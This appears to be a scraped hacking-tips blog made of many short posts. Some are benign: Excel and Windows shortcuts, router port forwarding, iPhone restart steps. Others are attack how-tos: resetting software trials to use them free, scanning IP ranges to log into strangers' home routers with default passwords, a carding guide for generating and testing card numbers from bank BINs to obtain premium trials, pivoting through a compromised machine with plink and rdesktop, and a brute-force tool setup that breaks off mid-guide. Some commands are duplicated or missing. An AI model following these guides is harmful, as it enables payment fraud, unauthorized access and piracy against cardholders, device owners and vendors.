Uncategorized

How To Hack or Reset Trial Period of Any Software and Use Them Lifetime in PC

How To Hack or Reset Trial Period of Any Software and Use Them Lifetime in PC 
Follow the steps for running this Software in your Computer.
#Hacks
①. Download “Runasdate” Software
②. Install Runasdate Software in your Computer PC.
③. Now run any trial software on your @devilbadhacker computer and write down the date of installation on your PC.
④. When your trial version gets over. Just Right Click on your software and select Runasdate.
Now Runasdate software extend the trial period of your software by increasing trial period. With the help of this software, you can use any software on your PC for a lifetime, without spending money
Uncategorized

Laptops & Computers Shortkey

Laptops & Computers Shortkeys

Ctrl+A – Select All
Ctrl+B – Bold
Ctrl+C – Copy 
Ctrl+D – Fill Down
Ctrl+F – Find
Ctrl+G – Goto
Ctrl+H – Replace
Ctrl+I – Italic
Ctrl+K – Insert Hyperlink
Ctrl+N – New Workbook
Ctrl+O – Open
Ctrl+P – Print
Ctrl+R – Fill Right
Ctrl+S – Save
Ctrl+U – Underline
Ctrl+V – Paste
Ctrl W – Close
Ctrl+X – Cut
Ctrl+Y – Repeat
Ctrl+Z – Undo
F1 – Help
F2 – Edit
F3 – Paste Name
F4 – Repeat last action
F4 – While typing a formula, switch between absolute/relative refs
F5 – Goto
F6 – Next Pane
F7 – Spell check
F8 – Extend mode
F9 – Recalculate all workbooks
F10 – Activate Menu bar
F11 – New Chart
F12 – Save As
Ctrl+: – Insert Current Time
Ctrl+; – Insert Current Date
Ctrl+\” – Copy Value from Cell Above
Ctrl+’ – Copy Formula from Cell Above
Shift – Hold down shift for additional functions in Excel’s menu
Shift+F1 – What’s This?
Shift+F2 – Edit cell comment
Shift+F3 – Paste function into formula
Shift+F4 – Find Next
Shift+F5 – Find
Shift+F6 – Previous Pane
Shift+F8 – Add to selection
Shift+F9 – Calculate active worksheet
Shift+F10 – Display shortcut menu
Shift+F11 – New worksheet
Ctrl+F3 – Define name
Ctrl+F4 – Close
Ctrl+F5 – XL, Restore window size
Ctrl+F6 – Next workbook window
Shift+Ctrl+F6 – Previous workbook window
Ctrl+F7 – Move window
Ctrl+F8 – Resize window
Ctrl+F9 – Minimize workbook
Ctrl+F10 – Maximize or restore window
Ctrl+F11 – Inset 4.0 Macro sheet
Ctrl+F1 – File Open
Alt+F1 – Insert Chart
Alt+F2 – Save As
Alt+F4 – Exit
Alt+Down arrow – Display AutoComplete list
Alt+’ – Format Style dialog box
Ctrl+Shift+~ – General format
Ctrl+Shift+! – Comma format
Ctrl+Shift+@ – Time format
Ctrl+Shift+# – Date format
Ctrl+Shift+$ – Currency format
Ctrl+Shift+% – Percent format
Ctrl+Shift+^ – Exponential format
Ctrl+Shift+& – Place outline border around selected cells
Ctrl+Shift+_ – Remove outline border
Ctrl+Shift+* – Select current region
Ctrl++ – Insert
Ctrl+- – Delete
Ctrl+1 – Format cells dialog box
Ctrl+2 – Bold
Ctrl+3 – Italic
Ctrl+4 – Underline
Ctrl+5 – Strikethrough
Ctrl+6 – Show/Hide objects
Ctrl+7 – Show/Hide Standard toolbar
Ctrl+8 – Toggle Outline symbols
Ctrl+9 – Hide rows
Ctrl+0 – Hide columns
Ctrl+Shift+( – Unhide rows
Ctrl+Shift+) – Unhide columns
Alt or F10 – Activate the menu
Ctrl+Tab – In toolbar: next toolbar
Shift+Ctrl+Tab – In toolbar: previous toolbar
Ctrl+Tab – In a workbook: activate next workbook 
Shift+Ctrl+Tab – In a workbook: activate previous workbook
Tab – Next tool
Shift+Tab – Previous tool
Enter – Do the command
Shift+Ctrl+F – Font Drop down List
Shift+Ctrl+F+F – Font tab of Format Cell Dialog box
Shift+Ctrl+P – Point size Drop down List
Ctrl + E – Align center
Ctrl + J – justify
Ctrl + L – align  
Ctrl + R – align right
Alt + Tab – switch applications
Windows + P – Project screen
Windows + E – open file explorer
Windows + D – go to desktop
Windows + M – minimize all window s
Windows + S – search
Uncategorized

How To Configure Port Forwarding to Create Internet-Connected Services

How To Configure Port Forwarding to Create Internet-Connected Services 
#hackingtutorials
Ports allow network and internet-connected devices to interact using specified channels. 
While servers with dedicated IP addresses can connect directly to the internet and make ports publicly available, a system behind a router on a local network may not be open to the rest of the web. 
To overcome this, port forwarding can be used to make these devices publicly accessible.
Networked services and apps running on various devices make use of ports at specific numbers as a means to initiate connections and establish communications. 
Different ports can be used simultaneously to easily separate and parse different types of traffic or requests. 
Ports are generally associated with specific services, such that a client can connect to a server on a specific port and assume that the server will accept a connection at that port and respond appropriately.
Some commonly used ports are shown below.
21: FTP (File Transfer Protocol)
22: SSH (Secure Shell)
23: Telnet (Teletype Network)
25: SMTP (Simple Mail Transfer Protocol)
80 : HTTP (Hypertext Transfer Protocol)
194: IRC (Internet Relay Chat)
443: HTTPS (HTTP Secure)
While ports make it simple to identify and address specific requests, port-numbering conventions are a standard, not a rule. 
Ports can be used for whatever a person may choose to host on them, so long as the connection between the client and server on a given port uses a consistent protocol.
In web browsers, non-standard HTTP ports can be specified following a colon at the end of an IP address or URL in order to attempt to load HTTP content over that port.
 If a web server is running on a local machine on port 8080 rather than the conventional port 80, it would be possible to access this in a web browser by navigating to localhost:8080 or 127.0.0.1:8080, but if either of the two aforementioned addresses were entered without the \”:8080\” suffix, the same page would not load.
While any open port should allow connection attempts, in order for these attempts to be made, a client device needs network access to the device. 
While this isn\’t necessarily an issue for a server connected to the internet directly or a connection across a local area network, it becomes problematic when one attempts to access a specific port on a device which is protected by a router or firewall.
Most home or office networks are connected to the internet through a router. 
A router is able to manage internet usage for a network and centralize the traffic at one IP address. 
All requests and packets are sent through the router before being distributed back to the respective devices which made the original requests. 
By default, routers do not handle incoming requests on specific ports. If one attempts to connect over SSH to a router, the router has no way to handle that request, nor does it know who on the network to forward the requests to. 
This problem can be solved by configuring port forwarding within the router.
 Step 1 

Identifying Your Router & Control Panel 
Routers generally provide an HTTP administration panel on port 80. 
This control center can be accessed by using the local network IP of the router, 192.168.0.1 or 192.168.1.1, in most cases. 
On Microsoft Windows, one can identify the location of the connected router or \”Default Gateway\” by opening a Command Prompt window and running the command below.
Command :-
ipconfig/all
​On Linux and macOS, the same can be accomplished using netstat. 
Open a new terminal window and run the following command to see the IP of the router you\’re connected to.
Command :- 
netstat -rn
Step 2 

 Accessing the Router 
 Configuration Panel
Once you\’ve identified the local IP address of your router, you can access the configuration panel by opening the address in your web browser, just as you would any other URL. 
(Note: some routers, such as Amplifi, actually have mobile apps that make this easier.)
​Once the router management page is open, log in to the router. 
The username and password may have been set by yourself (if you know what\’s good for you), an internet service provider, or be the router manufacturer\’s default credentials. 
This information can generally found online in the router\’s documentation, and sometimes even physically on the side of the router.
While all routers will have slightly different interfaces, once logged in, look for an \”Advanced\” area, or something which includes \”Port Forwarding.\” 
In the case below, the relevant area was titled \”Advanced Port Forwarding Rules.\”
 Step 3 

 Defining Port Forwarding Rules 
To demonstrate usage of port forwarding rules, we\’ll use a sample use case. 
In this scenario, a user has a Raspberry Pi connected to their home network router. 
The Pi has an SSH service running, allowing a user to log in if they have the correct username and password. 
The current IP address of the Pi is 192.168.0.105.
The user names the rule \”RBPi SSH\” to make it easier to identify for future administration. 
The name of the rule does not matter beyond personal preference, as it does not affect how the port is used.
The Public Port (sometimes called Source Port) range is set to 22 through 22, or the standard SSH port 22. 
This is the port which the router will reveal to the internet as being open, and the port which a user will connect to if they wish to connect to the Pi.
The Private Port (sometimes Destination Port) is set to 22 as well, as the SSH daemon is running on port 22 on the Pi.
The Traffic Type is set to TCP, as SSH is TCP traffic.
The IP Address is set to that of the Pi on the local network, 192.168.0.105.
Finally, the checkbox at the left of the rule is checked in order to enable the new setting.
While your router\’s interface may work slightly different, the concept is the same
This rule, when saved, means that now a user can connect to SSH to the IP address of the router from anywhere on the internet and be forwarded to their Raspberry Pi server. 
This could also be used to create an HTTP web server on port 80 or perhaps facilitate a video game server on a specific port. 
Keep in mind that some ISPs have defined rules regarding hosting servers and other content, and be sure to check any applicable rules before choosing to host an internet-accessible server on a local network.
One vulnerability that arises when exposing ports to the internet through port forwarding is port scanning. 
Attackers on the internet use automated drones to scan sets of IP addresses or use tools like Shodan to find potentially vulnerable devices with certain ports active. 
SSH ports are a prime target, as they represent a shell environment where data could be stolen and malware could potentially be installed
​In the case of port forwarding, to protect against port scanning, it may be advantageous to change the public or source port in the router configuration. 
Rather than using a common port like 22 which is frequently scanned for, a more uncommon port such as 9022 can serve just as well to connect over SSH to the Raspberry Pi without leaving a low-numbered port available to be discovered through scanning.
With this port changed, the only difference in usage is that a client connecting to the devices over SSH from outside the network will need to specify port 9022 rather than assuming the default port, 22, is in use.
 Attempting to connect to port 22 will not work outside of the local network, as while the SSH daemon on the Pi is running on that port, it is being forwarded over port 9022, not port 22.
While router-based port forwarding is useful for internet-facing network configuration, port forwarding can also be established at the system level when using Linux.
 Stepp 4 

 System Level Port Forwarding on Linux 
 
Much in the same way that a router port can be linked to a specific port on a device within a network, one port can also be linked to another to facilitate easier use. 
For instance, when installing the Cowrie honeypot, the SSH daemon is moved from port 22 to port 9022, and then port 2222 where the honeypot is running is forwarded to port 22 where it will be scanned and attacked on the internet.
To begin configuring local port forwarding on Linux, one may first need to enable it within Linux itself. 
To do this, run the command below to set the value of ip_forward to 1 or true.
Command :- 
echo \”1\” > /proc/sys/net/ipv4/ip_forward

​Once IP forwarding is enabled, ensure that you know the current port of the service you intend to forward. 

During the configuration of the Cowrie honeypot, this is done by changing the SSH daemon configuration to move the service to port 9022.
​Finally, to enable local port forwarding, iptables can be used. 
The command below redirects requests on port 22 to port 2222, where they are handled by the honeypot.
Command :- 
iptables -t nat -A PREROUTING -p tcp –dport 22 -j REDIRECT –to-port 2222

 Other Uses for Port Forwarding 

Port forwarding can be applied to other implementations, such as forwarding port 8080 to port 80 to make a test server more easily accessible or to simply add additional ports to use for a certain service. 
Port forwarding is a very valuable technique for remote access, server administration, network configuration, and even for post-exploitation and pivoting. 
Understanding it can be the key to countless other security projects!
Uncategorized

How To Force Restart the iPhone X When It\’s Acting Up

How To Force Restart the iPhone X When It\’s Acting Up 

#tips
​Every now and then, an iPhone will freeze up and become unresponsive due to a software glitch. 
It can be a buggy app that somehow interferes with iOS or a software update that somehow didn\’t install properly. 
Whatever the cause, it\’s safe to say that no iPhone is immune to this problem, not even the new iPhone X.
Fortunately, iOS is an extremely stable platform, and minor software issues can often be solved by simply powering down.
 Since a long-press on the Side button will activate Siri on the iPhone X, the process for turning the device off is different than other iPhone models.
In order to get the \”slide to power off\” option, you either have to go through the Settings app to access the \”Shut Down\” button or press the Side button and either Volume Up or Down together.
In that rare event where an iPhone X freezes up, however, a force restart — more commonly known as a hard reboot — will be needed to get it back to a responsive state. 
With the tried and true home button missing from Apple\’s exclusive flagship, the process has also changed for force restarting.
To perform a hard reboot on the iPhone X, press and quickly release the Volume Up button, then do the same for the Volume Down button. 
Follow up by pressing the Side button, and hold until the display suddenly shuts off — about 10 seconds. Keep holding the Side button and release when the device turns back onto its Apple boot screen. 
This is the same process the iPhone 8 and 8 Plus use to force-restart, too.
The iPhone X should boot up as normal, will all valuable data still intact. From there, you could further troubleshoot to find out the root of the problem.
While problems that necessitate force restarts hardly arise and is more often associated with jailbroken iPhones, it\’s still a handy tool to have in case of emergencies — especially with a newly-released iPhone.
Uncategorized

How To Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed

How To Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed 
Local port forwarding is good when you want to use SSH to pivot into a non-routable network. 
But if you want to access services on a network when you can\’t configure port-forwarding on a router and don\’t have VPN access to the network, remote port forwarding is the way to go.
Remote port forwarding excels in situations where you want access to a service on an internal network and have gained control of a machine on that network via a reverse shell of some kind. 
Whether you\’re a pentester or system admin, this is a good thing to know about.
For example, let\’s say you compromise a public terminal in the local library and get some credentials. 
You install a persistent reverse shell of some sort, which communicates back to your machine, but you don\’t have access to other services on the machine. 
The victim machine might have an SQL instance configured on localhost only that you want access to, or maybe you want to access the remote desktop. 
Maybe the network is hosting some sort of admin panel you\’d like to poke around in. Whatever it is you want, a compromised host and SSH will get you in.
Remote port forwarding isn\’t only for malicious scenarios. 
You can use it to punch a temporary hole out of a network to use work services at home, though that may be frowned upon by your security team.
Another excellent usage is in phishing campaigns where a user has executed your payload, and you only have a reverse shell connection back. 
After a bit of information gathering, then privilege escalation, you gather the credentials for the administrative user and wish to use those on another service on the compromised machine.
In this article, we\’ll be using SSH to access the remote desktop on a host located behind a firewall in an internal network — all without modifying the port forwarding rules on the gateway!
The Situation 
The shell is a Netcat connection running cmd.exe. 
The user \”bob\” is not a privileged user. 
Through prior information gathering, I know that the user \”barrow\” is a privileged user, and I also know that this machine has a remote desktop connection available.
It would be excellent to log into this machine via a remote desktop as an administrative user, but it is non-routable to my machine. 
Our compromised machine is behind a router, with an internal IP address, and I don\’t have access to the internal network, except via the internal host.
I can use the reverse shell to interact with the compromised host, but if I attempt to connect to a remote desktop, the IP address will be invalid. 
If I use the public-facing IP address, I will be connecting to a router which will just drop my packets. 
Since I don\’t have an SSH server on this network that I can pivot with, I\’ll have to use Plink to forward the remote desktop service to my attacking machine.
Step 1 

 Install Plink 
Plink is a Windows command line SSH client. 
It is included with Kali Linux in the /usr/share/windows-binaries/ directory. 
It can also be downloaded from the developer (look for the plink.exe file).
Link :-
Step 2 

Configure Remote Port Forwarding 
Using my Netcat shell and plink.exe, I set up a remote port forward to my attacking machine from my victim machine by typing the following into the reverse shell I have established from my victim machine.
plink attackingMachine -R 4000:127.0.0.1:3389
The syntax is similar to SSH. Using the -R option tells Plink to connect to the attacking machine and bind a channel on port 4000 (I arbitrarily selected port 4000 — you can select any port). 
The next portion in between the colons defines what service will be served to port 4000 on the attacking machine. 
In this case, the victim machine\’s port 3389. Once this command is entered, I will log in with my credentials to my attacking machine. 
Now, my attacking machine has access to the remote desktop service on the victim machine on my localhost port 4000.
If you\’re paying attention, you may have noticed that I used the localhost address on the victim machine. 
This can be useful for port forwarding services that are generally constrained to localhost access only, such as mySQL.
Step 3 

Log into a Remote Desktop 
With this running on my Netcat shell, I connect to my victim machine\’s remote desktop service using the rdesktop command. 
The following command uses the remote desktop protocol to connect to localhost port 4000 where my victim machine is forwarding its local port 3389.
Command :- 
rdesktop localhost:4000
All that\’s left to do is use a known credential to log into Windows, either phished or gained via privilege escalation.
 From here, I have full administrative access to the system, despite the system\’s gateway dropping all inbound connection requests. 
I also retained my initial shell connection, which is always important to me. 
Shells can be a lot easier to lose than they are to get back.
SSH is an excellent tool for pivoting in networks, but it\’s not limited to penetration testing. 
Remote port forwarding can provide you access to services on a machine that would normally be inaccessible. 
This can be useful if you want to share your services with networks that normally would not be able to reach them. 
For example, if you need to temporarily connect to a service at work from your home but the firewall is dropping all inbound packets. 
In some cases, setting up a reverse SSH tunnel is easier than port forwarding a consumer-grade router.
Uncategorized

How to protect yourself from Evil Twin Attacks

How to protect yourself from Evil Twin Attacks
1) Do not connect to public networks, everyone can smell your data while in a public network. The Twin Throw attack will be done as a public network, so restrict as much as possible the connection to all open or public networks mainly if the wifi name is the same as your wifi name
2) When the Internet connection stops working suddenly, it can be under DOS attack using a double evil attack, just restart the router and the attacker must restart the attack and it takes time. Maybe they will leave or continue at another time
3) Run a VPN to ensure that all browsing and data transmission is performed through an encrypted tunnel that can not be easily spied.
4) Do not always trust the name of the network, make sure it is a legitimate and reliable network or not.
Share and support us
For more such posts in your channel make me admin
Uncategorized

How to Hack the Home Routers and gain the Admin Rights

How to Hack the Home Routers and gain the Admin Rights…
Requirements:
Port Scanner (zenmap,superscan or unicornscan.I use Zenmap)
Web Browser (Chrome,Firfox or Safari)
Internet Connection(Any kind of Internet connection)
First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.
Instruction on How to Hack the Home Routers and gain the Admin Rights…
1. We should select an IP range. I have selected IP range that includes my public IP address.
XXX.XXX.30.0-XXX.XXX.30.255
2. Now let’s scan for home routers.
When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).
I have found many IP addesses with port 80 is opened.
So I stopped my scan.
3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.
4. If you see the alert error messages, it says TD-8817. So we can Google for it or you can visit routerpassword.com to know the default router username and password
5. Now let’s try to access these IP addresses using default logins we just got on step 4.
Default username and passwords are not same for every routers.
With username : admin and password : admin, we can log in to the router administration page
Hope you found it useful
Uncategorized

How to Make Working BIN for Premium Accounts?

How to Make Working BIN for Premium Accounts?
Before we start we should now one thing, there are two types of trial CC Verification in Premium Accounts trial. Let’s learn how to make bins
First one is, Validity Check Trial.
This type of trial just checks CC EXP CVV Validation and starts your trial
Very Very easy to bypass their verification
Eg. Tidal
Second one is, Authorization Hold trial.
This type of trial makes an authorixation hold on the card for 1 USD.
It also have verification system to verify card holder name if the card is VBV.
Eg. Netflix
For Finding a bin you need the following things Needed before starting Work
 Hardworking
Patience
 CC Generator
CC Checker
 Good Internet connection
VPN (Premium)
Now if you want to find a bin for the second type of Premium Accounts you should follow the following:-
Step 1: Goto Country/BANK to BIN webistes like
Step 2: Choose Any Country you want (Mainly Low secured countries like OMAN,UAE and etc)
Step 3: Choose Small Banks (They are less secured)
Step 4: Choose one BIN of Debit card (not credit)
Step 5: Generate CC with it
Step 6: Check with it
Step 7: Get lives one
Step 8: Test it
Step 9: Start from Step 2 again till you get working one
Attention: Don’t Share your hard work results with Peoples Or Else It Get Patched
For type 1 Trials:
Choose USA, CAPITAL ONE Mastercards.
1) Choose one BIN of Debit level card (not credit)
2) Generate CC with it
3)Check with it
4)Get lives one
5)Test it
Do Again and again till you get working one
Don’t forget to change your IP to the CC Countries IP
That’s it  then you get your own bin. Now you can easily get working bins or more like you can make working bins.
If you like our tutorial please share with your friends and support us. Stay updated for such awesome tips and tricks. Practice more and have patience to get working bins.
Uncategorized

TYPES OF PENETRATION TESTING

TYPES OF PENETRATION TESTING
Overt Penetration Testing: 
Using overt penetration testing, you work with the organization to identify  
potential security threats, and the organization’s IT or security team shows you  
the organization’s systems. The one main benefit of an overt test is that you  
have access to insider knowledge and can launch attacks without fear of  
being blocked. A potential downside to overt testing is that overt tests might  
not effectively test the client’s incident response program or identify how  
well the security program detects certain attacks. When time is limited and  
certain PTES steps such as intelligence gathering are out of scope, an overt  
test may be your best option. 
Covert Penetration Testing
Unlike overt testing, sanctioned covert penetration testing is designed to sim- 
ulate the actions of an attacker and is performed without the knowledge of  
most of the organization. Covert tests are performed to test the internal  
security team’s ability to detect and respond to an attack. 
Covert tests can be costly and time consuming, and they require more  
skill than overt tests. In the eyes of penetration testers in the security industry,  
the covert scenario is often preferred because it most closely simulates a true  
attack. Covert attacks rely on your ability to gain information by reconnais- 
sance. Therefore, as a covert tester, you will typically not attempt to find a  
large number of vulnerabilities in a target but will simply attempt to find the  
easiest way to gain access to a system, undetected.
Uncategorized

Here is a small list of some of the Frequently asked Questions about hacking:

Here is a small list of some of the Frequently asked Questions about hacking:
How long does it take to become a hacker?
Hacking is not something that can be mastered overnight.It really takes quite some time to understand and implement the skills that actually put you in the hacker’s shoes.
So, for anyone who is wanting to become a hacker, all it takes is some creativity,willingness to learn and perseverance.
What skills do I need to become a hacker?

In order to become a hacker, it is essential to have a basic understanding of how a computer system works.For example,you may start off with basics of operating system,computer networks and some programming.
Atthis point in time,you need not worry much about this question as this book will take you through all those necessary concepts to establish the skills that you need to possess as a hacker.
What is the best way to learn hacking?
Assaid earlier,the best way to learn hacking is to start off with the basics.Once you have established the basic skills,you can take it even further by going through the books that discuss individual topics in a much detailed fashion.Do not forget the power of Internet when it comes to acquiring and expanding your knowledge.
Uncategorized

How To Change Your IP In Less Than A Minute In PC

How To Change Your IP In Less Than A Minute In PC 

• Click on \”Start\” in the bottom left hand corner of screen
• Click on \”Run\”
• Type in \”command\” and hit ok
You should now be at an MSDOS prompt screen.
• Type \”ipconfig /release\” just like that, and hit \”enter\”
• Type \”exit\” and leave the prompt
• Right-click on \”Network Places\” or \”My Network Places\” on your desktop.
• Click on \”properties\” You should now be on a screen with something titled \”Local Area Connection\”, or something close to that, and, if you have a network hooked up, all of your other networks.
• Right click on \”Local Area Connection\” and click \”properties\”
• Double-click on the \”Internet Protocol (TCP/IP)\” from the list under the \”General\” tab
• Click on \”Use the following IP address\” under the \”General\” tab
• Create an IP address (It doesn\’t matter what it is. I just type 1 and 2 until i fill the area up).
• Press \”Tab\” and it should automatically fill in the \”Subnet Mask\” section with default numbers.
• Hit the \”Ok\” button here
• Hit the \”Ok\” button again You should now be back to the \”Local Area Connection\” screen.
• Right-click back on \”Local Area Connection\” and go to properties again.
• Go back to the \”TCP/IP\” settings
• This time, select \”Obtain an IP address automatically\” tongue.gif 
•18. Hit \”Ok\”
• Hit \”Ok\” again
• You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Uncategorized

How Trojans Impact Mobile Devices

How Trojans Impact Mobile Devices
━━━━━━━━━━━━━
Trojans aren’t problems for only laptop and desktop computers. They can also impact your mobile devices, including cell phones and tablets.
In general, a Trojan comes attached to what looks like a legitimate program. In reality, it is a fake version of the app, loaded up with malware. Cybercriminals will usually place them on unofficial and pirate app markets for unsuspecting users to download.
In addition, these apps can also steal information from your device, and generate revenue by sending premium SMS texts.
One form of Trojan malware has targeted Android devices specifically. Called Switcher Trojan, it infects users’ devices to attack the routers on their wireless networks. The result? Cybercriminals could redirect traffic on the Wi-Fi-connected devices and use it to commit various crimes.
━━━━━━━━━━━━━
Uncategorized

How to get a INVITE code from HTB(hack the box)?

How to get a INVITE code from HTB(hack the box)? 
▫️ Step 1
go to the inspect elements by pressing CTRL+SHIFT+I. you can see js/inviteapi.min.js parameter that seems interesting.
▫️ Step 2
go to the https://www.hackthebox.eu/js/inviteapi.min.js and look if there is anything to do with. you will see that there is makeInviteCode. we will use it in invite page console.
▫️ Step 3
go back to invite page and open inspect elements and go to the console and just write makeInviteCode there and hit ENTER. you will see some kinda encoded code.
▫️ Step 4
it is base64 encoded. go to https://www.base64decode.org/
and decode it easily. it will give you some parameter that will give you invite code.
▫️ Step 5
you can’t get anything by make get a request to https://www.hackthebox.eu/api/invite/generate. so we will make a post request using curl.
type this command in your terminal
curl -XPOST
And you will get the invite code. but remember, a particular invite-code will work only for a particular IP. so you won’t be able to use anyone’s code.
Uncategorized

What is cross-site scripting

What is cross-site scripting
Cross-site scripting is what happens when an attacker takes advantage of a vulnerability in a webpage to inject their own code. That code can steal user information such as credentials, session cookies, and other sensitive data, and can even live persistently on a site to attack multiple users.
A XSS attack is unique because these vulnerabilities don\’t target the website or web app they exploit–it\’s only an attack vector. XSS uses scripts that are executed on a user\’s machine; these scripts are called client-side scripts. The vast majority of these are coded in JavaScript or HTML, though there are other languages that can be used for client-side scripts.
Uncategorized

HOW TO SET A PASSWORD FOLDER

HOW TO SET A PASSWORD FOLDER
#Stark
1. Select the file or folder you want to encrypt.
2. Right-click the file or folder and select Properties.
3. On the General tab, click the Advanced button.
4. Check the box for the \”Encrypt contents to secure data\” option.
5. Click Apply and then OK.
Note: If the \”Encrypt contents to secure data\” option is not selectable and grayed out or you do not see the option at all, you likely have a Home edition of Windows, which does not support this feature. It is also possible that the hard drive where the files are located is not formatted as NTFS, as this is a requirement for the encryption feature.
Uncategorized

HOW TO USE PEN DRIVE AS RAM

HOW TO USE PEN DRIVE AS RAM :
1. First of all plug your USB in the USB port and make sure that you do not have any important data on USB.
2. Open your “My Computer” and Right click onto the USB. Which you want to use as RAM.
3. Select “Properties” (the last option) from the drop down menu.
4. A new window will open select “Ready Boost” Tab from there. And tick on the “Use this device” button.
5. Select the space which you want to use for RAM.
6. Finally click onto the “Apply” and then finally “OK” button.
7. That’s it you have successfully used your USB (Pen drive) as a virtual memory (RAM) for your computer.
Uncategorized

How to remove malware\’s using cmd

How to remove malware\’s using cmd
Step 1. Open Command Prompt from search and run as an administrator.
Step 2. Type D: and press Enter.
Step 3. Type attrib and press Enter. You\’ll see autorun.inf virus listed.
Step 4. To remove virus using CMD, type into your command prompt attrib -r -a -s -h *.* and press Enter. This will remove the Read Only, Archive, System and hidden file attribute from all the files. (*.* for all the files with all different types of file extensions).
Step 5. Type del autorun.inf and enter, to delete the files
Uncategorized

How To Fix Pen Drive Empty Problem Even The Drive Is Full

How To Fix Pen Drive Empty Problem Even The Drive Is Full
 The method is straight and simple, and you don’t need any technical knowledge, you just need a simple command entering that will easily fix out the issue of loss of files in Pendrive. Follow the methods discussed below. 
Method : New Drive Letter
Sometimes due to some hardware/software issue, our computer fails to recognize the hard drive and even if it does. It might show you some problem like empty USB drive even if the drive is full. So, here Assigning New drive letter might fix your problem and it is an easy task. So, make sure to apply this method first to check whether it’s working or not in your case. If it works, then you don’t need to go through the next methods.
1 First of all, reinsert your USB drive on your computer and then right click on ‘My Computer’ and then click on ‘Manage.’
2  beow you will get to see many options in Computer Management. Here you need to select the option ‘Disk Management.’
3 Now you need to find your USB drive and then right-click on it and select the option ‘Change Drive Letters and Paths’
4 Now you will be asked to choose a drive letter or Path. Simply select your drive letter and click ‘Ok’ button.
That’s it! Now remove your USB drive and reinsert it and check whether files inside your USB drive are showing or not. 
Uncategorized

How To Brute-Force SSH, FTP, VNC & More with BruteDum

How To Brute-Force SSH, FTP, VNC & More with BruteDum 
#hackingtutorials
Brute-forcing is an easy way of discovering weak login credentials and is often one of the first steps when a hacker finds network services running on a network they gain access to. 
For beginners and experienced hackers alike, it\’s useful to have access to the right tools to discover, classify, and then launch customized brute-force attacks against a target. 
BruteDum does it all from a single framework.
 Weak Passwords Are Easy Prey 
When a hacker gains access to a system with services running on it, one of the first things they\’ll typically do is see if they can log in to any of those services using default or common credentials. 
Internet of Things (IoT) hardware and devices like routers are often left with default passwords enabled, making them easy to attack.
To test the services they discover for weak passwords, the hacker needs to select the right tool for the job, and it can be confusing to know which tool is the best to use against a particular service.
BruteDum is a Python tool that allows a hacker to acquire a target first and run a scan inside the framework to determine the best tool based on what is discovered. 
It\’s easy to run a brute-force or dictionary attack against nearly any standard protocol that\’s vulnerable to it.
The advantage of running BruteDum over specific tools is the ability to run a scan from within to identify what other processes may be running on the same device, as well as organizing powerful tools for breaking into user accounts on services like SSH.
Online or Connected Attacks 
Unlike attacks launched against WPA networks where we can grab a hash and attempt cracking later, we need to be connected to our target directly over the network to try a brute-forcing or dictionary attack. 
While there are ways of hiding our identity with a VPN or Tor, brute-force and dictionary attacks can be limited in effectiveness through a variety of different means.
One way of limiting brute-force and dictionary attacks is through rate-limiting, in which a lockout is triggered after a set amount of incorrect login attempts. 
That, combined with flagging suspicious login attempts, can make brute-force and dictionary assaults more likely to alert a target that they are under attack.
To execute an online dictionary attack, we\’ll be using THC Hydra, Medusa, or Ncrack against the services we discover, using BruteDum to scan and organize our attacks between these tools. 
We\’ll also need a password list, which will be critical to the success or failure of our dictionary attack. 
If the password list is too large, it will take too long to attack the network, and if it isn\’t reasonably long enough to contain the password, we run the risk of it not being in the list, causing the attack to fail.
What You\’ll Need 
To follow this guide, you\’ll need Python3 installed on your system. 
Also, I recommend using Kali Linux, as it should have most of the required programs installed by default. If you\’re doing this on another system, you\’ll need to make sure that you have all the prerequisite programs installed.
If you\’re not using Kali Linux, you can use Ubuntu or Debian, but you\’ll need to make sure you have Hydra, Medusa, and Ncrack installed. 
You\’ll also need Nmap for scanning.
We\’ll also need a password list to test, and in this case, we\’ll be downloading it to a folder we create later. 
If you have a favorite password list, you\’ll need to copy it to the folder we\’ll be making.
Step 1 
 Download & Set Up BruteDum 
To get started, we\’ll need to download the repository from GitHub. 
In a new terminal window, you can type in the following command to clone the repo.
Command :-
/BruteDum Cloning into \’BruteDum\’… remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.
And this one to navigate into the directory :-
command to clone the repo.
Command :-
/BruteDum Cloning into \’BruteDum\’… remote: Enumerating objects: 15, done. remote: Counting objects: 100% (15/15), done. remote: Compressing objects: 100% (14/14), done. remote: Total 15 (delta 2), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (15/15), done.
And this one to navigate into the directory:
Command :-
~$ cd BruteDum
From inside this folder, you\’ll be able to run BruteDum. 
Before we do, we should take care of one small quirk. 
I found that BruteDum couldn\’t find password lists saved outside the BruteDum folder, so the solution seems to be adding our password list directly there. 
To do this, I\’ll simply take one off GitHub, and I\’ll download it to the folder I\’m in using the wget command.
Command. :-
~/BruteDum$ wget https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt –2020-01-10 17:19:59– https://raw.githubusercontent.com/berzerk0/Probable-Wordlists/master/Real-Passwords/Top207-probable-v2.txt Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.0.133, 151.101.64.133, 151.101.128.133, … Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443… connected. HTTP request sent, awaiting response… 200 OK Length: 1620 (1.6K) [text/plain] Saving to: ‘Top207-probable-v2.txt’ Top207-probable-v2. 100%[===================>] 1.58K –.-KB/s in 0s 2020-01-10 17:19:59 (53.3 MB/s) – ‘Top207-probable-v2.txt’ saved [1620/1620]
Once it\’s done, we can run BruteDum by typing the following command.
